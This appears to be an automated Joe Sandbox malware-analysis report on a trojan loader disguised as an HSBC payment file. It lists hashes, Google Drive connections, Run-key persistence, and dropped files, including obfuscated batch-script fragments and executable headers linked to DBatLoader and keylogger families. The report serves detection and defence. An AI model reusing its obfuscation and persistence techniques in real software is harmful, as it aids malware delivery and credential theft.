                                        http://ocsp.sectigo.com0CHSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.pmail.com0HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1720114378.0000000021DE0000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1702719653.000000007EFEA000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.000000002080C000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000002.2056661280.00000000207C3000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp, uzonfntK.pif.0.drfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              142.250.185.129
                                              		drive.usercontent.google.comUnited States
                                              		15169GOOGLEUSfalse
                                              142.250.184.238
                                              		drive.google.comUnited States
                                              		15169GOOGLEUSfalse

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1583879
                                              Start date and time:2025-01-03 20:01:06 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 9s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:16
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:HSBC_PAY.SCR.exe
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@21/7@2/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 60
                                              • Number of non-executed functions: 256
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: HSBC_PAY.SCR.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              14:01:55API Interceptor2x Sleep call for process: HSBC_PAY.SCR.exe modified
                                              14:02:15API Interceptor4x Sleep call for process: Ktnfnozu.PIF modified
                                              14:02:31API Interceptor9x Sleep call for process: uzonfntK.pif modified
                                              19:02:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ktnfnozu C:\Users\Public\Ktnfnozu.url
                                              19:02:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ktnfnozu C:\Users\Public\Ktnfnozu.url

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASNs

                                              No context

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              a0e9f5d64349fb13191bc781f81f42e1same.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                              • 142.250.185.129
                                              • 142.250.184.238
                                              nayfObR.exeGet hashmaliciousLummaCBrowse
                                              • 142.250.185.129
                                              • 142.250.184.238
                                              7z91gvU.exeGet hashmaliciousLummaCBrowse
                                              • 142.250.185.129
                                              • 142.250.184.238
                                              ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                              • 142.250.185.129
                                              • 142.250.184.238
                                              PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                              • 142.250.185.129
                                              • 142.250.184.238
                                              file.exeGet hashmaliciousLummaCBrowse
                                              • 142.250.185.129
                                              • 142.250.184.238
                                              file.exeGet hashmaliciousLummaCBrowse
                                              • 142.250.185.129
                                              • 142.250.184.238
                                              image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 142.250.185.129
                                              • 142.250.184.238
                                              MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                              • 142.250.185.129
                                              • 142.250.184.238

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Users\Public\Libraries\uzonfntK.pifPO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                  PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                    Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                      Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                        RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                          Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                            F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                qDKTsL1y44.exeGet hashmaliciousDBatLoaderBrowse

                                                                  Created / dropped Files

                                                                  C:\Users\Public\Ktnfnozu.url

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Ktnfnozu.PIF">), ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):104
                                                                  Entropy (8bit):5.065294406138099
                                                                  Encrypted:false
                                                                  SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMjiEovsbxWQcy497:HRYFVmTWDyz6yExXc197
                                                                  MD5:42088F5D634452012CBD7209DEF1EA95
                                                                  SHA1:DEFC8AA02E83F2D67FCB6A2B67F56DBAF9A0D21E
                                                                  SHA-256:53710C5A9611D3E2EC0E102F281A37D9DD7481C5F21062BEA79CF9BAD38121E4
                                                                  SHA-512:C337B9C6416B37C8B2EDC6F15C670596287BAEF8E3BE922E003D2ED0DD986D7549E1E33AF238F52E60E081E80624A5582C51105A9FCD05753439DEFFBD3A4C73
                                                                  Malicious:true
                                                                  Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Ktnfnozu.PIF"..IconIndex=964159..HotKey=94..

                                                                  C:\Users\Public\KtnfnozuF.cmd

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):15789
                                                                  Entropy (8bit):4.658965888116939
                                                                  Encrypted:false
                                                                  SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                  MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                  SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                  SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                  SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                  Malicious:false
                                                                  Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

                                                                  C:\Users\Public\Libraries\FX.cmd

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):8556
                                                                  Entropy (8bit):4.623706637784657
                                                                  Encrypted:false
                                                                  SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                  MD5:60CD0BE570DECD49E4798554639A05AE
                                                                  SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                  SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                  SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                  Malicious:true
                                                                  Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

                                                                  C:\Users\Public\Libraries\Ktnfnozu

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):615424
                                                                  Entropy (8bit):7.381515340181887
                                                                  Encrypted:false
                                                                  SSDEEP:12288:8Y/sftvhs7OT/3OlYRJDnuvhYIMn0h8OYRBl3VjUcSxxi1nHW8:8Ykftv27Af6yJDuq0fYXvjUtxs1nZ
                                                                  MD5:4E0C09D9A436A3FC3C10575583FE1A85
                                                                  SHA1:A9E1D707DB56EEAFBE5037142EB44312F205AAB8
                                                                  SHA-256:F1A661EBCBEE5A371E8BE7ED62F81B8941C7E4DC9ADC465F7057086C17C66873
                                                                  SHA-512:8D7C764C8FA36595314C544ED08D3F66236856B2DC2F6D2D708855C9BC4D9511E7AFCDE3D54CC7AEE6B9BDD9617D460B0DB7528854C1F8343A5A19F394097240
                                                                  Malicious:true
                                                                  Preview:...Y#..K .. .........$...'.......".....%..........!......%..."...#.....$.......Y#..KV!....'"......Y#..K..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................@.........,.P....Q]..H.F]...p.{ .a.R..........\.....v...i.m?...H.5x....lMS...r.s&.....,.@.(,.U.

                                                                  C:\Users\Public\Libraries\Ktnfnozu.PIF

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1010688
                                                                  Entropy (8bit):6.910065100990737
                                                                  Encrypted:false
                                                                  SSDEEP:12288:STHHBp6sm4kri5y5dnjxfJz+V3pr+Tykm9W9LDFo+hjr0ls5PsY9Dv7QC:SThoLrimdnjxxwZAk65PvHL
                                                                  MD5:23B640CC7B2CFF45CEEF1C718E7095E0
                                                                  SHA1:DCB684E452D59AF4B1BC7B5DE4BDCCD2B82A967B
                                                                  SHA-256:BFC7A921CD679AB7D693E30C552E352A7C564A75EC7E60B25960C63AE9067938
                                                                  SHA-512:1C77EFD15A2B3DC3E74D8C808CBCBB15122699754169616E68EA024845447EACFEF18B3358ED4D4CA397239F1ED9C9162CD568766BAFF5732C83F65F8293740D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................p....................@..............................................@...........................p...(...P..........................$....................................................w..X............................text...P........................... ..`.itext..|........................... ..`.data...0........ ..................@....bss.....6...0...........................idata...(...p...*..................@....tls....4............F...................rdata...............F..............@..@.reloc..$............H..............@..B.rsrc........P......................@..@.....................l..............@..@................................................................................................

                                                                  C:\Users\Public\Libraries\NEO.cmd

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):46543
                                                                  Entropy (8bit):4.705001079878445
                                                                  Encrypted:false
                                                                  SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                  MD5:637A66953F03B084808934ED7DF7192F
                                                                  SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                  SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                  SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                  Malicious:false
                                                                  Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

                                                                  C:\Users\Public\Libraries\uzonfntK.pif

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):175800
                                                                  Entropy (8bit):6.631791793070417
                                                                  Encrypted:false
                                                                  SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                  MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                  SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                  SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                  SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                  Joe Sandbox View:
                                                                  • Filename: PO_B2W984.com, Detection: malicious, Browse
                                                                  • Filename: image.exe, Detection: malicious, Browse
                                                                  • Filename: PO_KB#67897.cmd, Detection: malicious, Browse
                                                                  • Filename: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Detection: malicious, Browse
                                                                  • Filename: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Detection: malicious, Browse
                                                                  • Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Detection: malicious, Browse
                                                                  • Filename: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, Detection: malicious, Browse
                                                                  • Filename: F.O Pump Istek,Docx.bat, Detection: malicious, Browse
                                                                  • Filename: D.G Governor Istek,Docx.exe, Detection: malicious, Browse
                                                                  • Filename: qDKTsL1y44.exe, Detection: malicious, Browse
                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):6.910065100990737
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.38%
                                                                  • InstallShield setup (43055/19) 0.43%
                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  File name:HSBC_PAY.SCR.exe
                                                                  File size:1'010'688 bytes
                                                                  MD5:23b640cc7b2cff45ceef1c718e7095e0
                                                                  SHA1:dcb684e452d59af4b1bc7b5de4bdccd2b82a967b
                                                                  SHA256:bfc7a921cd679ab7d693e30c552e352a7c564a75ec7e60b25960c63ae9067938
                                                                  SHA512:1c77efd15a2b3dc3e74d8c808cbcbb15122699754169616e68ea024845447eacfef18b3358ed4d4ca397239f1ed9c9162cd568766baff5732c83f65f8293740d
                                                                  SSDEEP:12288:STHHBp6sm4kri5y5dnjxfJz+V3pr+Tykm9W9LDFo+hjr0ls5PsY9Dv7QC:SThoLrimdnjxxwZAk65PvHL
                                                                  TLSH:94258E2AA9A07231C5F716788F676AF4D81D7E262ABCED0432832D4CDE39594F039357
                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                  File Icon

                                                                  Icon Hash:4aaeaaa3a3ae884a

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x47081c
                                                                  Entrypoint Section:.itext
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:e7a7090255a5f7875fe104755dd5cb81

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  add esp, FFFFFFF0h
                                                                  mov eax, 0046FAC8h
                                                                  call 00007F54DCDA2CD5h
                                                                  mov eax, dword ptr [00472C84h]
                                                                  mov eax, dword ptr [eax]
                                                                  call 00007F54DCDF9151h
                                                                  mov ecx, dword ptr [00472B58h]
                                                                  mov eax, dword ptr [00472C84h]
                                                                  mov eax, dword ptr [eax]
                                                                  mov edx, dword ptr [0046ED00h]
                                                                  call 00007F54DCDF9151h
                                                                  mov ecx, dword ptr [00472B88h]
                                                                  mov eax, dword ptr [00472C84h]
                                                                  mov eax, dword ptr [eax]
                                                                  mov edx, dword ptr [00460EB0h]
                                                                  call 00007F54DCDF9139h
                                                                  mov eax, dword ptr [00472C84h]
                                                                  mov eax, dword ptr [eax]
                                                                  call 00007F54DCDF91ADh
                                                                  call 00007F54DCDA0A54h
                                                                  lea eax, dword ptr [eax+00h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x770000x28f0.idata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x850000x7a200.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7c0000x8024.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x7b0000x18.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x777980x658.idata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x6ed500x6ee00daa369c1c7302cafea809093a53a0507False0.5089354918263811data6.544039894422103IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .itext0x700000x87c0xa00fe34997d59685c957fb3750e4d557caaFalse0.5296875data5.614720387175179IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .data0x710000x1e300x200043382a1eaa80d3c01ce80587b6288384False0.4013671875data3.8854181170774957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .bss0x730000x36f80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .idata0x770000x28f00x2a006b443f0f4779220e4f9e1bd6895f4e31False0.31138392857142855data5.125914990690079IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .tls0x7a0000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rdata0x7b0000x180x2009ff41def55ab2d70218df758701840dfFalse0.05078125data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x7c0000x80240x8200384f5029685514f75716c11855b1d830False0.6024939903846154data6.662919273857788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
